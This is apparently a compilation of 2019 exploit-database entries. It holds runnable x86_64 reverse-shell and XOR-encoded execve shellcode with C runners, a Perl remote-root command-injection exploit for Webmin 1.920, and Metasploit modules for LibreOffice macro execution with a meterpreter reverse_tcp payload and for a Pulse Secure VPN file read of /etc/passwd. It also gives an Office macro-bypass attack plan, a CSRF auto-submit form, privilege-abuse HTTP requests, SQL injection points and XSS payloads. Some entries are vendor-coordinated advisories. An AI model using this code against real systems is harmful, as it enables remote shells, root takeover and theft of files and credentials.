/*
; Title    : Linux/x86_64 - Reverse Shell (/bin/sh) with Password (configurable) (120 bytes)
; Date    : 2019-08-18
; Author  : Gonçalo Ribeiro (@goncalor)
; Website  : goncalor.com
; SLAE64-ID  : 1635

global _start

%define pass "pass"
%define port 0x5c11  ; htons(4444)

_start:
    jmp real_start
    password: db pass
    pass_len: db $-password

real_start:
socket:
    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    ; AF_INET = 2
    ; SOCK_STREAM = 1
    ; __NR_socket = 41
    ; On success, a file descriptor for the new socket is returned

    push 41
    pop rax
    push 2
    pop rdi
    push 1
    pop rsi
    cdq       ; copies rax's bit 31 to all bits of edx (zeroes rdx)
    syscall

    push rax
    pop rdi

connect:
    ; server.sin_family = AF_INET;    short
    ; server.sin_port = htons(4444);    unsigned short
    ; server.sin_addr.s_addr = inet_addr("127.0.0.1");    unsigned long
    ; bzero(&server.sin_zero, 8);
    ;
    ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
    ; struct sockaddr_in {
    ;     short            sin_family;
    ;     unsigned short   sin_port;
    ;     struct in_addr   sin_addr;
    ;     char             sin_zero[8];
    ; };
    ;
    ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
    ; AF_INET = 2
    ; __NR_connect = 42
    ; On success, zero is returned

    xor eax, eax
    push rax          ; sin_zero
    push 0x10ffff70   ; sin_addr (xored)
    xor dword [rsp], 0x11ffff0f ; recover sin_addr
    push word port
    push word 2

    ; connect
    add al, 42
    push rsp
    pop rsi
    add dl, 16    ; sizeof(sockaddr_in)
    syscall

dup2:
    ; dup2(sock, 0);
    ; dup2(sock, 1);
    ; dup2(sock, 2);
    ; __NR_dup2 = 33
    ; On success, return the new file descriptor

    push 2
    pop rsi

dup2_loop:
    mov al, 33
    syscall
    dec esi
    jns dup2_loop

read_password:
    ; read(int fd, void *buf, size_t count)
    ; On success, the number of bytes read is returned

    ;xor eax, eax  ; already done by dup2
    ;rdi = "sock"  ; already done
    push rax
    push rax       ; create space for "buf" in the stack
    push rsp
    pop rsi        ; rsi = *buf
    mov dl, 16
    syscall

compare_password:
    xor ecx, ecx
    lea rdi, [rel pass_len]
    mov cl, [rdi]
    sub rdi, rcx
    cld
    repz cmpsb
    jne exit

execve:
    ; execve(const char *path, char *const argv[], char *const envp[])
    ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
    ; rsi, argv = (char**) (/bin//sh, 0x00)
    ; rdx, envp = &0x00

    xor eax, eax
    push rax
    push rsp
    pop rdx      ; *rdx = &0x00

    mov rsi, 0x68732f2f6e69622f  ; rax2 -S $(echo /bin//sh | rev)
    push rsi
    push rsp
    pop rdi      ; rdi = (char*) /bin//sh

    push rax
    push rdi
    push rsp
    pop rsi      ; rsi = (char**) (/bin//sh, 0x00)

    mov al, 59
    syscall

exit:
    ;xor eax, eax  ; upper bytes are zero after read
    mov al, 60
    syscall
*/


#include <stdio.h>
#include <string.h>

char code[] =
"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
"\x05\x50\x5f\x31\xc0\x50\x68\x70\xff\xff\x10\x81\x34\x24\x0f\xff\xff\x11"
"\x66\x68\x11\x5c\x66\x6a\x02\x04\x2a\x54\x5e\x80\xc2\x10\x0f\x05\x6a\x02"
"\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31"
"\xc9\x48\x8d\x3d\xb6\xff\xff\xff\x8a\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a"
"\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f"
"\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0\x3c\x0f\x05";

int main() {
    printf("length: %lu\n", strlen(code));
    ((int(*)()) code)();
}

# Exploit Title: Microsoft Office Code Execution/Protection Bypass
# Exploit Author: Social Engineering Neo  -  @EngineeringNeo
# Software Link:
https://products.office.com/en-nz/compare-all-microsoft-office-products
# Version: Office365/ProPlus - (build 16.0.11901.20204)
# Tested on: Windows - (build 18362.295)

Microsoft Office365/ProPlus Auto Macro Code Execution/Protection
Bypass by Social Engineering Neo.
Check out our in-depth report @
https://github.com/SocialEngineeringNeo/Exploits/blob/master/Our%20Exploits/Microsoft/Office/MacroAutoExec_Report.txt

Affected Platforms: -
Microsoft Windows ≤10
Office365 & ProPlus Products ≤2019


Tested On: -
Windows 10 (build 17763.253 & 18362.295)
Office365/ProPlus (build 16.0.11727.20222, 16.0.11901.20170 & 16.0.11901.20204)
Most up to-date version of Microsoft Windows & Office365/ProPlus
Products are affected.


Class: -
Inappropriate Configuration. (CWE-16)
Remote Code Execution.


Summary: -
Multiple Microsoft Office Products Suffer from Inappropriate Default
Configuration, Allowing Auto-Execution of Macro Code Inside
Macro-Enabled Office Documents.


Short Description: -
Macro-enabled Office documents can bypass protections when located in
specific directories/locations on the host machine.


Long Description: -
Standard users can download macro-enabled Access, Excel, PowerPoint,
Word documents and bypass built-in protections allowing potentially
malicious code to run on the affected system without any user consent.
For example, the standard user downloads a macro-enabled Word document
from the internet. The user has the latest Windows & Office365/ProPlus
patches installed.
Let’s assume the document is downloaded & opened in '~\Downloads\', MS
Word will prevent the script(s) from running and prompt the user for
consent to execute the script. (this is good)
Now, let’s assume that same document is opened in one of the default
"Trusted Locations"'~\AppData\Roaming\Microsoft\Word\STARTUP\', MS
Word will allow the script to run automatically without user consent.
(this is bad)


Proof of Concept: -
Tested on Latest Versions of Access, Excel, InfoPath, OneNote,
Outlook, PowerPoint, Project, Publisher, Visio, Word.

Does (by-default) affect Access, Excel, PowerPoint, Word.
Does not (by-default) affect InfoPath, Visio.
Does not affect OneNote, Outlook, Project, Publisher.

ATTACKER: -
Step 1.) -  Inject malicious VBA macro code & payload into Word
document.    *preferably AV evasive*
Step 2.) -  Send malicious macro-enabled document to victim through internet.
Step 3.) -  Setup bind/reverse connection.
*Optional*
Step 1.1) - Create shortcut to intended document location (one of the
default trusted locations). Include link file with original document.
Step 1.2) - Be creative. Think of some path traversal
vulnerabilities;)    *who updates zip software anyways*

VICTIM: -
Step 1.) -  Download document sent by ATTACKER.
Step 2.) -  Open Document in trusted directory/location.
*If Optional Was Done*
Step 1.1) - Unzip/extract document.
Step 1.2) - Open document shortcut.

[CODE EXECUTION SUCCESSFUL]

Am I at risk??? Sure...
Step 1.) -   Open Microsoft Office Product.
Step 1.1) -  Create a new blank document.

Step 2.) -   Navigate to File, Options.
Step 2.1) -  Once in the "Word Options" window. Navigate to 'Trust
Center', 'Trust Center Settings'

Step 3.) -   Once in the "Trust Center" window. Navigate to 'Trusted Locations'

You will now see locations on the device which can execute macro
commands without additional user interaction. (auto-exec)

VIDEO: -   https://youtu.be/jNBl6yiYwmo **updated**
     : -   https://youtu.be/j75GUD9oUK4 **original**


Expected Result: -
It shouldn't be possible to automatically execute macro code on the
host machine without user consent or additional configuration.
(Clean Install)


Observed Result: -
Office document auto-executes macro code upon loading document without
any user consent, in our case leading to remote code execution.
(User Level Access)


Our Recommendation:
Disable 'Trusted Locations'. This is due to users often not using the
default trusted locations, potentially leaving average users
vulnerable to such attacks when there is no need.

/*
; Title    : Linux/x86_64 - AVX2 XOR Decoder + execve("/bin/sh") (62 bytes)
; Date    : 2019-08-18
; Author  : Gonçalo Ribeiro (@goncalor)
; Website  : goncalor.com
; SLAE64-ID  : 1635

; this only works on machines with a CPU that supports AVX2 instructions

global _start

_start:
    jmp call_decoder

decoder:
    pop rsi
    lea rdi, [rsi+1]

    ; shellcode is less than 32 bytes long. can decode with single 256-bit xor.
    ; for longer shellcodes a loop could be added
    vpbroadcastb ymm1, [rsi]  ; avx2
    vmovdqu ymm0, [rdi]       ; avx
    vpxor ymm0, ymm1          ; avx2
    vmovdqu [rdi], ymm0       ; avx

    jmp encoded_shellcode

call_decoder:
    call decoder
    xor_value: db 0xaa
    encoded_shellcode: db 0xe2,0x9b,0x6a,0xfa,0xe2,0x23,0x48,0xe2,0x14,0x85,0xc8,0xc3,0xc4,0x85,0x85,0xd9,0xc2,0xfc,0xe2,0x23,0x4d,0xfa,0xfd,0xe2,0x23,0x4c,0x1a,0x91,0xa5,0xaf
*/


#include <stdio.h>
#include <string.h>

char code[] =
"\xeb\x18\x5e\x48\x8d\x7e\x01\xc4\xe2\x7d\x78\x0e\xc5\xfe\x6f\x07\xc5\xfd"
"\xef\xc1\xc5\xfe\x7f\x07\xeb\x06\xe8\xe3\xff\xff\xff\xaa\xe2\x9b\x6a\xfa"
"\xe2\x23\x48\xe2\x14\x85\xc8\xc3\xc4\x85\x85\xd9\xc2\xfc\xe2\x23\x4d\xfa"
"\xfd\xe2\x23\x4c\x1a\x91\xa5\xaf";

int main() {
    printf("length: %lu\n", strlen(code));
    ((int(*)()) code)();
}

# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
# Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
# Date: 18 july, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
# Version: 2.2.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : Fresh

#About Plugin
The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
#Vulnerable Description
WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
## CSRF Code
Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe    =    application/x-msdownload">
<input type="submit">
</form>
</body>
</html>

Exploit Title       : CWP (CentOS Control Web Panel) User enumerate through HTTP response time
Date                : 15 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.848
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-13599
Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13599.md


# Description

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.848, the Login process allows attackers to check whether a username is valid by comparing response times


# PoC

1. Login with valid user and invalid password, the server response time is about 250ms
2. Login with an invalid user and invalid password, the server response time is about 180ms

*The response time are also depend on the network speed. but however, when we log in with valid and invalid username, the response time will be different

Exploit Title       : CWP (CentOS Control Web Panel) Arbitrary database dropping
Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.851
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14245
Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14245.md

1. Log in as a normal user.
2. Go to "MySQL Manager"
3. Try to delete any database from the account
4. Intercept the request, and modify parameter "database" to target database name such as "oauthv2"

POST /cwp_226727d95b77d953/alice/alice/index.php?module=mysql_manager&acc=deletedatabase HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 20
Connection: close
Referer: https://192.168.80.148:2083/cwp_226727d95b77d953/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

database=oauthv2

Exploit Title       : CWP (CentOS Control Web Panel) Reset other phpMyadmin password
Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.851
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14246
Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14246.md


1. Login as attacker (low privilege)
2. Go to "Mysql Manager"
3. Try to change user password of any record
4. Intercept the request

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 54
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

dates=alice_alice||localhost&passuser=UEBzc3cwcmQxMjM0


5. Modify the request (parameter "dates") and submit

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 54
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

dates=bob||localhost&passuser=UEBzc3cwcmQxMjM0

#!/usr/bin/perl -w
#
#  Webmin 1.920 Remote Root Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#  Disclaimer:
#  This or previous programs are for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  The other exploits not works for me..
#
#  Tested on CentOS
#
#  [test@localhost ~]$ perl webmin.pl
#  [ Webmin 1.920 Remote Root Exploit
#  [ ==========================================================
#  [ First time released at Defcon
#  [ Thank you guys, for all..
#  [ Exploit by: Todor Donev
#  [ <todor.donev@gmail.com>
#  [ ==========================================================
#  [ Usage: webmin.pl <host> <port> <command>
#  [ e.g. webmin.pl localhost 10000 "unset HISTFILE;uname -a;id;uptime"
#
#  uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
#  [test@localhost ~]$ 
#
#
#
#    ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !! 
#
#  Guys, please give a star to https://github.com/otvorete/petition
#  to support the cause of the Bulgarian Hackers (Developers) Community.
#  We want to makes our Electronic Government more securе, transparent 
#  and reliable. For this reason we want from our government to open 
#  the source codes of the applications. So support us with a star, 
#  please..
#
#  Special thanks to Konstantin Spirov that starting the cause!!
#
#

use strict;
use HTTP::Request;
use LWP::UserAgent;

my $host = shift || 'localhost';
my $port = shift || '10000';
my $cmd = shift || 'uname -a;id;uptime';
$cmd =~ s/\|/\;/g;

print "[ Webmin 1.920 Remote Root Exploit\n";
print "[ ==========================================================\n";
print "[ First time released at Defcon\n";
print "[ Thank you guys, for all..\n";
print "[ Exploit by: Todor Donev\n";
print "[ <todor.donev\@gmail.com>\n";
print "[ ==========================================================\n";
print "[ Usage: $0 <host> <port> <command>\n";
print "[ e.g. $0 localhost 10000 \"unset HISTFILE;uname -a;id;uptime\"\n";
my $browser  = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 });
   $browser->timeout(5);
   $browser->agent('Mozilla/5.0');
my $target = "https://".$host.":".$port."/password_change.cgi";
my $request = HTTP::Request->new (
                    POST => $target,
                    [ Content_Type => "application/x-www-form-urlencoded" ,
                      Referer => "https://".$host.":".$port."/session_login.cgi" ],
"user=wheel&pam=&expired=2&old=id|echo OWNED;$cmd;echo OWNED&new1=wheel&new2=wheel");
$request->header("Cookie" => "redirect=1; testing=1; sid=x; sessiontest=1;");
my $content = $browser->request($request)->as_string();
print $1 and exit if ($content =~ m/OWNED(.*?)OWNED/ms);
print "[ Exploit Failed!\n" and exit if (not $content =~ m/OWNED(.*?)OWNED/ms);

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
'Name'            => 'LibreOffice Macro Python Code Execution',
'Description'     => %q{
        LibreOffice comes bundled with sample macros written in Python and
        allows the ability to bind program events to them.

        LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.

        This module generates an ODT file with a dom loaded event that,
        when triggered, will execute arbitrary python code and the metasploit payload.
      },
'License'         => MSF_LICENSE,
'Author'          =>
        [
'Nils Emmerich',    # Vulnerability discovery and PoC
'Shelby Pace',      # Base module author (CVE-2018-16858), module reviewer and platform-independent code
'LoadLow',          # This msf module
'Gabriel Masei'     # Global events vuln. disclosure
        ],
'References'      =>
        [
          [ 'CVE', '2019-9851' ],
          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],
          [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],
          [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
        ],
'DisclosureDate'  => '2019-07-16',
'Platform'        => 'python',
'Arch'            => ARCH_PYTHON,
'DefaultOptions'  => { 'Payload' => 'python/meterpreter/reverse_tcp' },
'Targets'         => [ ['Automatic', {}] ],
'DefaultTarget'   =>  0
    ))

    register_options(
    [
      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
      OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
    ])
  end

  def gen_file
    text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
    py_code = Rex::Text.encode_base64(payload.encoded)
    @cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"
    @cmd = Rex::Text.html_encode(@cmd)

    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
    libre_file = ERB.new(fodt_file).result(binding())

    print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")

    libre_file
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  def exploit
    fodt_file = gen_file

    file_create(fodt_file)
  end
end

# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 8/20/2019
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: Linux
# CVE : CVE-2019-11510 
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Post::File
  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Pulse Secure - System file leak',
'Description'    => %q{
        Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
        This exploit reads /etc/passwd as a proof of concept
        This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
      },
'References'     =>
          [
              [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
          ],
'Author'         => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
'License'        => MSF_LICENSE,
'DefaultOptions' =>
          {
'RPORT' => 443,
'SSL' => true
          },
      ))

  end


  def run()
    print_good("Checking target...")
    res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)

    if res && res.code == 200
      print_good("Target is Vulnerable!")
      data = res.body
      current_host = datastore['RHOST']
      filename = "msf_sslwebsession_"+current_host+".bin"
      File.delete(filename) if File.exist?(filename)
      file_local_write(filename, data)
      print_good("Parsing file.......")
      parse()
    else
      if(res && res.code == 404)
        print_error("Target not Vulnerable")
      else
        print_error("Ooof, try again...")
      end
    end
  end
  def parse()
    current_host = datastore['RHOST']

      fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
      words = 0
      while (line = fileObj.gets)
        printable_data = line.gsub(/[^[:print:]]/, '.')
        array_data = printable_data.scan(/.{1,60}/m)
        for ar in array_data
          if ar != "............................................................"
            print_good(ar)
          end
        end
        #print_good(printable_data)

    end
    fileObj.close
  end
end

SEC Consult Vulnerability Lab Security Advisory < 20190821-0 >
=======================================================================
              title: Unauthenticated sensitive information leakage
            product: Zoho Corporation ManageEngine ServiceDesk Plus
 vulnerable version: v10 <10509
      fixed version: v10 >=10509
         CVE number: CVE-2019-15045, CVE-2019-15046
             impact: Critical
           homepage: https://www.manageengine.com/products/service-desk/
              found: 2019-06-27
                 by: Johannes Greil (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ServiceDesk Plus is a game changer in turning IT teams from daily
fire-fighting to delivering awesome customer service. It provides great
visibility and central control in dealing with IT issues to ensure that
businesses suffer no downtime. For 10 years and running, it has been
delivering smiles to millions of IT folks, end users, and stakeholders
alike."

Source: https://www.manageengine.com/products/service-desk/


Business recommendation:
------------------------
The vendor provides a patched version and it should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a short
spot check has been performed and further critical issues are to be expected.
A workaround exists for mitigating vulnerability 1b (user enumeration).


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated sensitive information leakage
a) Unauthenticated download of internal support ticket information (CVE-2019-15046)
The software offers functionality (fosagent) that an unauthenticated attacker can
exploit in order to gain information of internal "events". In our test it was
possible to access sensitive internal information (tickets) written by users of
this application in exchange with the support team. Depending on the contents of
the tickets, sensitive data might leak through this functionality. It is likely,
that it also depends on the configuration of ServiceDesk Plus which information is
stored in those "events".

b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
It is possible to collect valid usernames by interacting with the
"AjaxDomainServlet" function of the application without prior authentication.
This vulnerability is useful to increase the efficiency of brute force attacks.
If the username is known, it is easier to find the corresponding password.

Furthermore, the servlet leaks information, whether the user is a locally
configured or a domain user and it also leaks the internal domain names of the
requested user account.

According to the vendor, the affected feature is intended behaviour and a
workaround in order to disable it has been provided (see further below).


Proof of concept:
-----------------
1) Unauthenticated sensitive information leakage
a) Unauthenticated download of internal support ticket information (CVE-2019-15046)
The "fosagent" functionality provides a "download-file" servlet which an
unauthenticated attacker can use in order to iterate through existing internal
"events". The information that can be downloaded looks like internal ticket system
information and other data exchanged between users and the help desk support team.
It is necessary to supply the "log-pos" parameter given a number followed by a
colon character and another number to access the corresponding event index. An
attacker can just increment those numbers and access different information.

https://$IP/fosagent/repl/download-file?log-pos=1:0


b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
The following URL can be used to efficiently enumerate user accounts configured
within ManageEngine ServiceDesk Plus. No prior authentication is required for
this functionality. The "search" parameter is used for supplying the user account
name.

https://$IP/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=$USER

If the user exists and is a local user (configured within the web application)
it will show "Not in Domain" as a result. If the user exists and is a domain
user (e.g. LDAP) it will show the corresponding internal domain name as a result.
If the page stays empty the user does not exist.


Vulnerable / tested versions:
-----------------------------
Version 10 has been tested. The vendor did not confirm whether older releases are
affected as well.


Vendor contact timeline:
------------------------
2019-07-02: Contacting vendor through ManageEngine Security Response Center
            (MESRC)
            Uploaded security advisory to bugbounty.zoho.com
2019-07-02: Vendor: acknowledged our report and will get back to us soon
2019-07-08: Asking for a status update; reponse: "we've investigated the report
            and working on the fix now"
2019-07-10: Asking about CVE numbers and requesting heads-up before release
2019-08-13: Asking for a status update
2019-08-13: Vendor: vulnerability has already been fixed and released in version
            10509
2019-08-21: Release of security advisory


Solution:
---------
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html

The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#10509


Workaround:
-----------
Vulnerability 1b - User Enumeration: the affected feature is intended behaviour
for usability but the vendor provided a workaround in order to disable this
feature.

The admin can disable this in:
Admin-Self-Service Portal Settings (Configuration - Allow Domain Filtering during
Login).


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF J. Greil / @2019

          ===============================
                   - Advisory -
          ===============================

  Tittle:   KBPublisher 6.0.2.1 - Multiple SQL Injection
    Risk:   High
    Date:   21.Aug.2019
  Author:   Pedro Andujar
 Twitter:   @pandujar



.: [ INTRO ] :

KBPublisher is Knowledge Management Software. It reduces the need for customer support, improves staff productivity, and eliminates 
time wasted searching for information.


.: [ TECHNICAL DESCRIPTION ] :.

KBPublisher release 6.0.2, and probably prior versions, contain multiple SQLi vulnerabilities that affect not only the admin interface but also the public (unauthenticated)
area of the application


.: [ ISSUE #1 ]:.

Name: Multiple SQLi
Severity: High
CVE: CVE-2019-10687

Affected URL's from the admin area:
https://SITE/admin/index.php?module=report&page=report_entry&entry_id%5B0%5D=325PAYLOAD&filter%5Bt%5D=1&ajax=1 (Also affecting to POST parameters)

https://SITE/admin/index.php?module=log&page=login_log&action=detail&id=PAYLOAD

The publicly accesible URL, correspond to the print feature:
https://SITE/index.php?View=print&id%5B%5D=PAYLOAD

During the test, it was possible to dump users and hashes of the application as any other content from the DB.


.: [ CHANGELOG ] :.

  * 21/Mar/2019:   - Vuln discovered during engagement.
  * 21/Mar/2019:   - KBP product security contacted. 
  * 22/Mar/2019:   - Replied providing workarround. 
  * 30/Apr/2019:   - New release of KBP released to public. 
  * 21/Ago/2019:   - Public disclosure.

(Kudos to Evgeny Leontev, for the excelent communication and incident handling)


.: [ SOLUTIONS ] :.

Upgrade to version 7.0 or higher.


.: [ REFERENCES ] :.

   [+] KBPublisher Release Notes
    https://www.kbpublisher.com/kb/release-notes-59/

   [+] Tarlogic
    https://www.tarlogic.com/

   [+] Black Arrow
    https://www.blackarrow.net




                    -=EOF=-

Hello Team,

Greetings. there is list of xss vulnerabilities and Concurrent login
vulnerabilities are in snapforce
<https://crm.snapforce.com/prodigy/login.php?timeout> (version 8.3.0)
application.



*Vulnerability List: *

1. Stored Cross Site Scripting

2. Stored Cross Site Scripting thorough UI Redirection.

3 Concurrent Login are Allowed

*Effected URL: *

https://crm.snapforce.com/prodigy/login.php



*Steps to reproduce:*

1.Login to application using https://crm.snapforce.com/prodigy/login.php

2. Goto the Accounts creation location and create new Account.

3. Fill all required parameters and insert XSS payload in description
location and save it.

4. once you saved the xss payload in description location cross site
scripting payload can execute.

5. application can redirect to attacker application my case i have
redirected to google.com page

6. for more information please see attached file



*Payloads:*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<script>document.location='https://google.com'</script>

*Mitigation:*

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
